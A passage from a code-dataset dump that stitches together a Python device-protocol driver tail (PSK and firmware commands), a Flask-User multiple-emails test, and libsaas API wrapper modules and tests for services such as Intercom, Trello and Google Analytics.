encode_message_protocol(data, COMMAND_PRESET_PSK_WRITE_R)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_PRESET_PSK_WRITE_R)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_PRESET_PSK_WRITE_R)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x00
def preset_psk_read_r(
self,
flags: int,
length: Optional[int] = None,
offset: Optional[int] = None
) -> Tuple[bool, Optional[int], Optional[bytes]]:
print(f"preset_psk_read_r({flags}, {length}, {offset})")
if (length is None or offset is None) and (length is not None or
offset is not None):
raise ValueError("Invalid length or offset")
self.write(
encode_message_pack(
encode_message_protocol(
(b"" if length is None else encode("<I", length)) +
(b"" if offset is None else encode("<I", offset)) +
encode("<I", flags) + encode("<I", 0),
COMMAND_PRESET_PSK_READ_R)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_PRESET_PSK_READ_R)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_PRESET_PSK_READ_R)
message_length = len(message)
if message_length < 1:
raise SystemError("Invalid response length")
if message[0] != 0x00:
return False, None, None
if message_length < 9:
raise SystemError("Invalid response length")
psk_length = decode("<I", message[5:9])[0]
if message_length - 9 < psk_length:
raise SystemError("Invalid response length")
return True, decode("<I", message[1:5])[0], message[9:9 + psk_length]
def write_firmware(self,
offset: int,
payload: bytes,
number: Optional[int] = None) -> bool:
print(f"write_firmware({offset}, {payload}, {number})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<I", offset) + encode("<I", len(payload)) +
(b"" if number is None else encode("<I", number)) + payload,
COMMAND_WRITE_FIRMWARE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_WRITE_FIRMWARE)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_WRITE_FIRMWARE)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def read_firmware(self, offset: int, length: int) -> bytes:
print(f"read_firmware({offset}, {length})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<I", offset) + encode("<I", length),
COMMAND_READ_FIRMWARE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_READ_FIRMWARE)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_READ_FIRMWARE)
if len(message) < length:
raise SystemError("Invalid response length")
return message[:length]
def check_firmware(self,
offset: Optional[int] = None,
length: Optional[int] = None,
checksum: Optional[int] = None,
hmac: Optional[bytes] = None) -> bool:
print(f"update_firmware({offset}, {length}, {checksum}, {hmac})")
if offset is None or length is None or checksum is None:
if offset is not None or length is not None or checksum is not None:
raise ValueError("Invalid offset, length or checksum")
if offset is None and hmac is None:
raise ValueError("Invalid offset, length, checksum or hmac")
self.write(
encode_message_pack(
encode_message_protocol(
(b"" if offset is None else encode("<I", offset) +
encode("<I", length) + encode("<I", checksum)) +
(b"" if hmac is None else hmac), COMMAND_CHECK_FIRMWARE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_CHECK_FIRMWARE)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_CHECK_FIRMWARE)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def get_iap_version(self, length: int) -> str:
print(f"get_iap_version({length})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", length) + b"\x00", COMMAND_GET_IAP_VERSION)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_GET_IAP_VERSION)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_GET_IAP_VERSION)
if len(message) < length:
raise SystemError("Invalid response length")
return message.split(b"\x00")[0].decode()
``` |
{
"source": "80pctsols/Flask-User",
"score": 2
} |
#### File: flask_user/tests/test_multiple_emails.py
```python
from __future__ import print_function
import datetime
from flask import current_app, url_for
# **********************
# ** Global Variables **
# **********************
# Using global variable for speed
user1 = None
# ********************************
# ** Automatically called Tests **
# ********************************
# The 'client' and 'app' parameters are set up in conftest.py
# Functions that start with 'test' will be run automatically by the test suite runner (py.test)
def test_multiple_emails(app, db, client):
"""
Test 'multiple emails per user' feature
"""
# Set Flask-User settings
um = current_app.user_manager
um.enable_register = True
um.enable_username = False
um.enable_email = True
um.enable_confirm_email = True
um.enable_change_username = False
um.enable_change_password = False
um.enable_forgot_password = False
um.enable_multiple_emails = True
um.enable_retype_password = False
# Adjust DbAdapter settings
um.db_adapter.UserEmailClass = app.UserEmailClass
# Adjust URL routes
app.add_url_rule(um.email_action_url, 'user.email_action', um.email_action_view_function)
app.add_url_rule(um.manage_emails_url, 'user.manage_emails', um.manage_emails_view_function, methods=['GET', 'POST'])
# constants
EMAIL1 = '<EMAIL>'
EMAIL2 = '<EMAIL>'
PASSWORD = '<PASSWORD>'
# Register user
response = client.post_valid_form(url_for('user.register'), email=EMAIL1, password=PASSWORD)
user_email1 = um.db_adapter.UserEmailClass.query.filter(um.db_adapter.UserEmailClass.email==EMAIL1).first()
assert user_email1 != None
# Confirm email
confirmation_token = um.generate_token(user_email1.id)
client.get_valid_page(url_for('user.confirm_email', token=confirmation_token))
# Log in using email1
client.login(email=EMAIL1, password=PASSWORD)
# Visit manage emails page
response = client.get_valid_page(url_for('user.manage_emails'))
assert response.data.find(EMAIL1) >= 0
# Add an email
response = client.post_valid_form(url_for('user.manage_emails'), email=EMAIL2)
assert response.data.find(EMAIL1) >= 0
assert response.data.find(EMAIL2) >= 0
user_email2 = um.db_adapter.UserEmailClass.query.filter(um.db_adapter.UserEmailClass.email==EMAIL2).first()
assert user_email2 != None
# Confirm email
confirmation_token = um.generate_token(user_email2.id)
client.get_valid_page(url_for('user.confirm_email', token=confirmation_token))
# Logout
client.logout()
# Log in using email1
client.login(email=EMAIL1, password=PASSWORD)
# Logout
client.logout()
# Log in using email2
client.login(email=EMAIL2, password=PASSWORD)
# Confirm
response = client.get_valid_page(url_for('user.email_action', id=user_email2.id, action='confirm'))
# Make primary
response = client.get_valid_page(url_for('user.email_action', id=user_email2.id, action='make-primary'))
# Delete
response = client.get_valid_page(url_for('user.email_action', id=user_email1.id, action='delete'))
# Logout
client.logout()
# Restore settings
um.enable_multiple_emails = False
um.enable_confirm_email = True
um.enable_retype_password = True
um.db_adapter.UserEmailClass = None
``` |
{
"source": "80vs90/libsaas",
"score": 2
} |
#### File: services/github/releases.py
```python
from libsaas.services import base
from . import resource
class ReleaseAssetBase(resource.GitHubResource):
path = 'assets'
class ReleaseAssets(ReleaseAssetBase):
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class ReleaseAsset(ReleaseAssetBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class ReleasesBase(resource.GitHubResource):
path = 'releases'
class Releases(ReleasesBase):
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
class Release(ReleasesBase):
@base.resource(ReleaseAssets)
def assets(self):
return ReleaseAssets(self)
@base.resource(ReleaseAsset)
def asset(self, asset_id):
return ReleaseAsset(self, asset_id)
```
#### File: services/googleanalytics/reporting.py
```python
from libsaas import http, parsers
from libsaas.services import base
from .resources import translate_param
class Reporting(base.HierarchicalResource):
path = 'data'
def get_url(self, api_endpoint):
return '{0}/{1}/{2}'.format(self.parent.get_url(), self.path,
api_endpoint)
@base.apimethod
def core(self, ids, start_date, end_date, metrics, dimensions=None,
sort=None, filters=None, segment=None, start_index=None,
max_results=None, fields=None, prettyPrint=None, userIp=None,
quotaUser=None, access_token=None, key=None):
"""
Query the Core Reporting API for Google Analytics report data.
:var ids: The unique table ID of the form ga:XXXX, where XXXX is the
Analytics view (profile) ID for which the query will retrieve the
data.
:vartype ids: str
:var start-date: The first date of the date range for which you are
requesting the data.
:vartype start-date: str
        :var end-date: The last date of the date range for which you are
requesting the data.
:vartype end-date: str
:var metrics: A list of comma-separated metrics, such as
ga:visits,ga:bounces.
:vartype metrics: str
:var dimensions: A list of comma-separated dimensions for your
Analytics data, such as ga:browser,ga:city.
:vartype dimensions: str
        :var sort: A list of comma-separated dimensions and metrics indicating
the sorting order and sorting direction for the returned data.
:vartype sort: str
:var filters: Dimension or metric filters that restrict the data
returned for your request.
:vartype filters: str
:var segment: Segments the data returned for your request.
:vartype segment: str
:var start-index: The first row of data to retrieve, starting at 1.
Use this parameter as a pagination mechanism along with the
max-results parameter.
:vartype start-index: int
:var max-results: The maximum number of rows to include in the response
:vartype max-results: int
:var fields: Selector specifying a subset of fields to include in the
response.
:var prettyPrint: Returns response with indentations and line breaks.
Default false.
:vartype prettyPrint: bool
:var userIp: Specifies IP address of the end user for whom the API call
is being made. Used to cap usage per IP.
:vartype userIp: str
:var quotaUser: Alternative to userIp in cases when the user's IP
address is unknown.
:vartype quotaUser: str
:var access_token: One possible way to provide an OAuth 2.0 token.
:vartype access_token: str
:var key: Used for OAuth 1.0a authorization to specify your application
to get quota. For example: key=AldefliuhSFADSfasdfasdfASdf.
:vartype key: str
"""
params = base.get_params(None, locals(),
translate_param=translate_param)
request = http.Request('GET', self.get_url('ga'), params)
return request, parsers.parse_json
@base.apimethod
def realtime(self, ids, metrics, dimensions=None, sort=None, filters=None,
max_results=None, fields=None, prettyPrint=None, userIp=None,
quotaUser=None, access_token=None, key=None ):
"""
Returns real-time data for a view (profile)
:var ids: The unique table ID of the form ga:XXXX, where XXXX is the
Analytics view (profile) ID for which the query will retrieve the
data.
:vartype ids: str
:var metrics: A list of comma-separated metrics, such as
ga:visits,ga:bounces.
:vartype metrics: str
:var dimensions: A list of comma-separated dimensions for your
Analytics data, such as ga:browser,ga:city.
:vartype dimensions: str
        :var sort: A list of comma-separated dimensions and metrics indicating
the sorting order and sorting direction for the returned data.
:vartype sort: str
:var filters: Dimension or metric filters that restrict the data
returned for your request.
:vartype filters: str
:var max-results: The maximum number of rows to include in the response
:vartype max-results: int
:var fields: Selector specifying a subset of fields to include in the
response.
:var prettyPrint: Returns response with indentations and line breaks.
Default false.
:vartype prettyPrint: bool
:var userIp: Specifies IP address of the end user for whom the API call
is being made. Used to cap usage per IP.
:vartype userIp: str
:var quotaUser: Alternative to userIp in cases when the user's IP
address is unknown.
:vartype quotaUser: str
"""
params = base.get_params(None, locals(),
translate_param=translate_param)
request = http.Request('GET', self.get_url('realtime'), params)
return request, parsers.parse_json
```
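As a usage note: `core()` and `realtime()` only build an `http.Request` plus a JSON parser; an installed executor actually runs them. A minimal sketch follows — the `googleanalytics` import path, the service constructor and the `reporting()` accessor are assumptions made for illustration and are not part of the excerpt above; only the `core()` signature is.
```python
# Sketch only. The service module path, constructor signature and the
# reporting() accessor below are assumptions; core() itself is defined above.
from libsaas.executors import test_executor
from libsaas.services import googleanalytics  # assumed module path

executor = test_executor.use()        # in-memory executor, no network traffic
executor.set_response(b'{}', 200, {})

ga = googleanalytics.GoogleAnalytics(access_token='token')  # assumed signature
ga.reporting().core(                                        # assumed accessor
    ids='ga:12345',
    start_date='2014-01-01',          # translated to the API's start-date
    end_date='2014-01-31',            # translated to end-date
    metrics='ga:visits,ga:bounces',
    dimensions='ga:browser',
    max_results=50)                   # translated to max-results
print(executor.request.uri)           # ends in /data/ga, per get_url() above
```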
#### File: services/intercom/resource.py
```python
from libsaas import http, parsers
from libsaas.services import base
class IntercomResource(base.RESTResource):
def get_url(self):
return '{0}/{1}'.format(self.parent.get_url(), self.path)
@base.apimethod
def get(self, page=None, per_page=None):
"""
Fetch all of the objects.
:var page: The page that should be returned. If left as `None`,
            the first page is returned.
:vartype page: int
:var per_page: How many objects should be returned. The
maximum is 500. If left as `None`, 500 objects are returned.
:vartype per_page: int
"""
params = base.get_params(('page', 'per_page'), locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class UserBase(IntercomResource):
path = 'users'
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Users(UserBase):
@base.apimethod
def update(self, obj):
"""
Update this resource.
:var obj: a Python object representing the updated resource, usually in
the same format as returned from `get`. Refer to the upstream
documentation for details.
"""
request = http.Request('PUT', self.get_url(), self.wrap_object(obj))
return request, parsers.parse_json
class User(UserBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
@base.apimethod
def get(self, user_id=None, email=None):
"""
Fetch the object's data.
:var user_id: The user_id of the user that should be returned.
Required if no email.
:vartype user_id: int
:var email: The email of the user that should be returned.
Required if no user_id.
:vartype email: str
"""
if not user_id and not email:
raise TypeError('get() must be passed at least one '
'of user_id, email')
params = base.get_params(('user_id', 'email'), locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class Impressions(IntercomResource):
path = 'users/impressions'
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class MessageThreadBase(IntercomResource):
path = 'users/message_threads'
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class MessageThreads(MessageThreadBase):
@base.apimethod
def get(self, user_id=None, email=None):
"""
Fetch all of the objects for the user.
        :var user_id: The user_id of the user whose messages should be
            returned. Required if no email.
        :vartype user_id: int
        :var email: The email of the user whose messages should be
            returned. Required if no user_id.
        :vartype email: str
"""
if not user_id and not email:
raise TypeError('get() must be passed at least one '
'of user_id, email')
params = base.get_params(('user_id', 'email'), locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
@base.apimethod
def reply(self, obj):
"""
Reply to a message thread from an admin from a user
"""
request = http.Request('PUT', self.get_url(), self.wrap_object(obj))
return request, parsers.parse_json
class MessageThread(MessageThreadBase):
@base.apimethod
def get(self, thread_id, user_id=None, email=None):
"""
        Fetch a single object.
:var thread_id: The thread_id of the message that should be returned.
:vartype thread_id: int
        :var user_id: The user_id of the user whose message should be
            returned. Required if no email.
        :vartype user_id: int
        :var email: The email of the user whose message should be
            returned. Required if no user_id.
        :vartype email: str
"""
if not user_id and not email:
raise TypeError('get() must be passed at least one '
'of user_id, email')
params = base.get_params(('user_id', 'email'), locals())
params['thread_id'] = thread_id
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class Counts(IntercomResource):
path = 'counts'
@base.apimethod
def get(self, type=None, count=None):
"""
Get counts of users and companies filtered by certain criteria.
:var type: The count's type
:vartype type: str
:var count: The count's filter criteria
:vartype count: str
"""
params = base.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Events(IntercomResource):
path = 'events'
@base.apimethod
def create(self, event_name, created_at, user_id=None, email=None,
metadata=None):
"""
Create a new Event object.
:var event_name: The name of the event that occurred.
:vartype event_name: str
:var created_at: The time the event occurred as a UTC Unix timestamp.
:vartype created_at: int
        :var user_id: The user_id of the user the event is associated
            with. Required if no email.
        :vartype user_id: int
        :var email: The email of the user the event is associated with.
            Required if no user_id.
        :vartype email: str
:var metadata: Optional metadata about the event.
:vartype metadata: dict
"""
if not user_id and not email:
raise TypeError(
'create() must be passed at least one of user_id, email')
params = base.get_params(None, locals())
request = http.Request('POST', self.get_url(), params)
return request, parsers.parse_empty
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Companies(IntercomResource):
path = 'companies'
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Company(Companies):
@base.apimethod
def get(self):
"""
Fetch the company's data.
"""
params = {'company_id': self.object_id}
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
@base.apimethod
def users(self):
"""
Fetch the company's users.
"""
params = base.get_params(None, locals())
url = '{0}/{1}/{2}'.format(self.get_url(), self.object_id, 'users')
request = http.Request('GET', url, params)
return request, parsers.parse_json
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
```
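A brief sketch of how these resources are typically reached. The `Intercom` service object, its constructor arguments and the `users()`/`user()`/`events()` accessors are assumptions for illustration; the pagination parameters, the `TypeError` guards and the `MethodNotSupported` overrides are the parts taken from the code above.
```python
# Sketch only. The service class and its accessors are assumed; the
# behaviour being illustrated comes from the resource classes above.
from libsaas.executors import test_executor
from libsaas.services import intercom  # assumed module path

test_executor.use().set_response(b'{}', 200, {})
service = intercom.Intercom('app-id', 'api-key')  # assumed signature

service.users().get(page=2, per_page=100)   # paginated user listing
service.user().get(email='[email protected]')    # single user, looked up by email
service.events().create(event_name='invited-friend',
                        created_at=1389913941,
                        email='[email protected]')
# Unsupported calls fail locally before any request is built, e.g.
# service.users().delete() raises base.MethodNotSupported, and
# user().get() with neither user_id nor email raises TypeError.
```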
#### File: services/newrelic/resource.py
```python
from libsaas import http
from libsaas.services import base
class NewRelicResource(base.RESTResource):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class ApplicationResource(NewRelicResource):
path = 'applications'
class ApplicationRelatedResource(NewRelicResource):
def __init__(self, parent, application_id, object_id=None):
self.parent = parent
self.object_id = object_id
self.application_id = http.quote_any(application_id)
if self.object_id:
self.object_id = http.quote_any(self.object_id)
def get_url(self):
if self.object_id is None:
return '{0}/applications/{1}/{2}'.format(self.parent.get_url(),
self.application_id, self.path)
return '{0}/applications/{1}/{2}/{3}'.format(self.parent.get_url(),
self.application_id, self.path, self.object_id)
```
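To make the URL composition concrete, here is a small sketch. The `Metrics` subclass and the stub parent are hypothetical stand-ins (only `ApplicationRelatedResource` above is real), and the sketch assumes that class is in scope.
```python
# Hypothetical subclass and stub parent, used only to show the URL layout
# produced by ApplicationRelatedResource.get_url() above.
class StubService(object):
    def get_url(self):
        return 'https://api.newrelic.com/v2'   # stand-in for the real API root

class Metrics(ApplicationRelatedResource):
    path = 'metrics'

print(Metrics(StubService(), '1234').get_url())
# https://api.newrelic.com/v2/applications/1234/metrics
print(Metrics(StubService(), '1234', '42').get_url())
# https://api.newrelic.com/v2/applications/1234/metrics/42
```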
#### File: services/pingdom/servertime.py
```python
from libsaas import port
from libsaas.services import base
from . import resource
class Servertime(resource.PingdomGETResource):
path = 'servertime'
# redefine methods to set docstring later
@base.mark_apimethod
def get(self):
return super(Servertime, self).get()
port.method_func(Servertime, 'get').__doc__ = """
Get the current time of the API server.
Upstream documentation: {0}
""".format('https://www.pingdom.com/services/api-documentation-rest/'
'#ResourceServertime')
```
#### File: services/pingdom/settings.py
```python
from libsaas import port
from libsaas.services import base
class Settings(base.RESTResource):
path = 'settings'
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
def require_item(self):
pass
# redefine methods to set docstring later
@base.mark_apimethod
def update(self, obj):
return super(Settings, self).update(obj)
port.method_func(Settings, 'update').__doc__ = """
Modify account-specific settings.
Upstream documentation: {0}
""".format('https://www.pingdom.com/services/api-documentation-rest/'
'#MethodModify+Account+Settings')
```
#### File: services/stripe/plans.py
```python
from libsaas import http, parsers
from libsaas.services import base
from . import resource
class PlansBaseResource(resource.StripeResource):
path = 'plans'
class Plan(PlansBaseResource):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class Plans(PlansBaseResource):
@base.apimethod
def get(self, limit=10):
"""
Fetch all plans.
:var limit: A limit on the number of objects to be returned. Limit can
range between 1 and 100 items.
:vartype limit: int
"""
params = base.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
```
#### File: services/trello/members.py
```python
from libsaas import http, parsers
from libsaas.services import base
from .resource import (
serialize_param, TrelloFieldMixin, TrelloFilterMixin,
TrelloResource, TrelloCollection, TrelloReadonlyCollection)
class Actions(TrelloReadonlyCollection):
path = 'actions'
class BoardBackgrounds(TrelloCollection):
path = 'boardBackgrounds'
class BoardBackground(TrelloResource):
path = 'boardBackgrounds'
class BoardStars(TrelloCollection):
path = 'boardStars'
@base.apimethod
def get(self):
request = http.Request('GET', self.get_url())
return request, parsers.parse_json
class BoardStar(TrelloResource):
path = 'boardStars'
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
class CustomBoardBackgrounds(TrelloCollection):
path = 'customBoardBackgrounds'
class CustomBoardBackground(TrelloResource):
path = 'customBoardBackgrounds'
class CustomStickers(TrelloCollection):
path = 'customStickers'
class CustomSticker(TrelloResource):
path = 'customStickers'
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
class Boards(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'boards'
class Cards(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'cards'
class Notifications(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'notifications'
class Organizations(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'organizations'
class Sessions(TrelloReadonlyCollection):
path = 'sessions'
class Tokens(TrelloReadonlyCollection):
path = 'tokens'
class Member(TrelloResource, TrelloFieldMixin):
path = 'members'
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
@base.apimethod
def get(self, **kwargs):
"""
Fetch a single object.
Upstream documentation:
https://trello.com/docs/api/member/index.html
"""
params = base.get_params(None, kwargs, serialize_param=serialize_param)
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
@base.resource(Actions)
def actions(self):
"""
Returns all actions
"""
return Actions(self)
@base.resource(BoardBackgrounds)
def board_backgrounds(self):
"""
Returns all board backgrounds
"""
return BoardBackgrounds(self)
    @base.resource(BoardBackground)
def board_background(self, board_background_id):
"""
Returns a single board background
"""
return BoardBackground(self, board_background_id)
@base.resource(BoardStars)
def board_stars(self):
"""
Returns all board stars
"""
return BoardStars(self)
@base.resource(BoardStar)
def board_star(self, board_star_id):
"""
Returns a single board star
"""
return BoardStar(self, board_star_id)
@base.resource(CustomBoardBackgrounds)
def custom_board_backgrounds(self):
"""
Returns all custom board backgrounds
"""
return CustomBoardBackgrounds(self)
@base.resource(CustomBoardBackground)
def custom_board_background(self, board_background_id):
"""
Returns a single custom board background
"""
return CustomBoardBackground(self, board_background_id)
@base.resource(CustomStickers)
def custom_stickers(self):
"""
Returns all custom stickers
"""
return CustomStickers(self)
@base.resource(CustomSticker)
def custom_sticker(self, sticker_id):
"""
        Returns a single custom sticker
"""
return CustomSticker(self, sticker_id)
@base.resource(Notifications)
def notifications(self):
"""
Returns all notifications
"""
return Notifications(self)
@base.resource(Organizations)
def organizations(self):
"""
Returns all organizations
"""
return Organizations(self)
@base.resource(Boards)
def boards(self):
"""
Returns all boards
"""
return Boards(self)
@base.resource(Cards)
def cards(self):
"""
Returns all cards
"""
return Cards(self)
@base.resource(Sessions)
def sessions(self):
"""
Returns all sessions
"""
return Sessions(self)
@base.resource(Tokens)
def tokens(self):
"""
Returns all tokens
"""
return Tokens(self)
```
#### File: services/trello/service.py
```python
import json
from libsaas import http
from libsaas.services import base
from .members import Member
from .actions import Action
from .cards import Card, Cards
from .lists import List, Lists
from .boards import Board, Boards
from .notifications import Notification
from .checklists import Checklist, Checklists
from .organizations import Organization, Organizations
class Trello(base.Resource):
"""
"""
def __init__(self, key, token=None):
"""
Create a Trello service.
:var key: Your application key
:vartype key: str
:var token: The authorization token from the user (optional).
:vartype token: str
"""
self.apiroot = 'https://api.trello.com/1'
self.key = key
self.token = token
self.add_filter(self.add_auth)
self.add_filter(self.use_json)
def get_url(self):
return self.apiroot
def add_auth(self, request):
params = {'key': self.key}
if self.token:
params.update({'token': self.token})
if request.method.upper() in http.URLENCODE_METHODS:
request.params.update(params)
else:
request.params = json.dumps(request.params)
request.uri += '?' + http.urlencode_any(params)
def use_json(self, request):
if request.method.upper() not in http.URLENCODE_METHODS:
request.headers['Content-Type'] = 'application/json'
@base.resource(Action)
def action(self, action_id):
"""
Return the resource corresponding to a single action.
"""
return Action(self, action_id)
@base.resource(Boards)
def boards(self):
"""
Return the resource corresponding to all boards
"""
return Boards(self)
@base.resource(Board)
def board(self, board_id):
"""
Return the resource corresponding to a single board
"""
return Board(self, board_id)
@base.resource(Cards)
def cards(self):
"""
Return the resource corresponding to all cards
"""
return Cards(self)
@base.resource(Card)
def card(self, card_id_or_shortlink):
"""
Return the resource corresponding to a single card
"""
return Card(self, card_id_or_shortlink)
@base.resource(Checklists)
def checklists(self):
"""
Return the resource corresponding to all checklists
"""
return Checklists(self)
@base.resource(Checklist)
def checklist(self, checklist_id):
"""
Return the resource corresponding to a single checklist
"""
return Checklist(self, checklist_id)
@base.resource(Lists)
def lists(self):
"""
Return the resource corresponding to all lists
"""
return Lists(self)
@base.resource(List)
def list(self, list_id):
"""
Return the resource corresponding to a single list
"""
return List(self, list_id)
@base.resource(Member)
def me(self):
"""
Return the resource corresponding to the current member
"""
return Member(self, 'me')
@base.resource(Member)
def member(self, member_id_or_username):
"""
Return the resource corresponding to a single member
"""
return Member(self, member_id_or_username)
@base.resource(Notification)
def notification(self, notification_id):
"""
Return the resource corresponding to a single notification
"""
return Notification(self, notification_id)
@base.resource(Organizations)
def organizations(self):
"""
Return the resource corresponding to all organizations
"""
return Organizations(self)
@base.resource(Organization)
def organization(self, organization_id_or_name):
"""
Return the resource corresponding to a single organization
"""
return Organization(self, organization_id_or_name)
```
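A short usage sketch, grounded in the service definition above and the `test_executor` pattern used by the test modules further down in this document: resources compose lazily, and calling an apimethod such as `get()` or `filter()` hands the built request to whichever executor is installed.
```python
# Runs against the in-memory test executor (no network); a real client
# would install one of the library's HTTP executors instead.
from libsaas.executors import test_executor
from libsaas.services import trello

executor = test_executor.use()
executor.set_response(b'{}', 200, {})

service = trello.Trello('app-key', 'user-token')

service.me().boards().filter('open')
print(executor.request.uri)
# https://api.trello.com/1/members/me/boards/open (key/token added as params)

service.board('1234').lists().get(limit=10)
print(executor.request.params)
# {'limit': 10, 'key': 'app-key', 'token': 'user-token'}
```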
#### File: libsaas/test/test_flurry.py
```python
import unittest
from libsaas.executors import test_executor
from libsaas.services import flurry
class FlurryTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = flurry.Flurry('my-api-access-code')
def expect(self, uri, params={}):
self.assertEqual('GET', self.executor.request.method)
self.assertEqual(self.executor.request.uri,
'http://api.flurry.com' + uri)
params.update({'apiAccessCode': 'my-api-access-code'})
if params:
self.assertEqual(self.executor.request.params, params)
def test_applications(self):
self.service.applications().get()
self.expect('/appInfo/getAllApplications')
def test_application(self):
self.service.application('my-api-key').get()
self.expect('/appInfo/getApplication', {
'apiKey': 'my-api-key'
})
(self.service.application('my-api-key')
.events().get('start_date', 'end_date'))
self.expect('/eventMetrics/Summary', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key')
.event('event_name').get('start_date', 'end_date'))
self.expect('/eventMetrics/Event', {
'apiKey': 'my-api-key',
'eventName': 'event_name',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.active_users('start_date', 'end_date'))
self.expect('/appMetrics/ActiveUsers', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.active_users_by_week('start_date', 'end_date'))
self.expect('/appMetrics/ActiveUsersByWeek', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.active_users_by_month('start_date', 'end_date'))
self.expect('/appMetrics/ActiveUsersByMonth', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.new_users('start_date', 'end_date', group_by='WEEKS'))
self.expect('/appMetrics/NewUsers', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
'groupBy': 'WEEKS'
})
(self.service.application('my-api-key').metrics()
.median_session_length('start_date', 'end_date'))
self.expect('/appMetrics/MedianSessionLength', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.avg_session_length('start_date', 'end_date'))
self.expect('/appMetrics/AvgSessionLength', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
})
(self.service.application('my-api-key').metrics()
.sessions('start_date', 'end_date'))
self.expect('/appMetrics/Sessions', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.page_views('start_date', 'end_date', version_name='v1'))
self.expect('/appMetrics/PageViews', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
'versionName': 'v1'
})
(self.service.application('my-api-key').metrics()
.avg_page_views_per_session('start_date', 'end_date'))
self.expect('/appMetrics/AvgPageViewsPerSession', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.retained_users('start_date', 'end_date', 'US'))
self.expect('/appMetrics/RetainedUsers', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
'country': 'US'
})
```
#### File: libsaas/test/test_segmentio.py
```python
import json
import unittest
from libsaas.services import segmentio
from libsaas.executors import test_executor
class SegmentIOTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = segmentio.SegmentIO('my-api-secret')
def expect(self, uri, params):
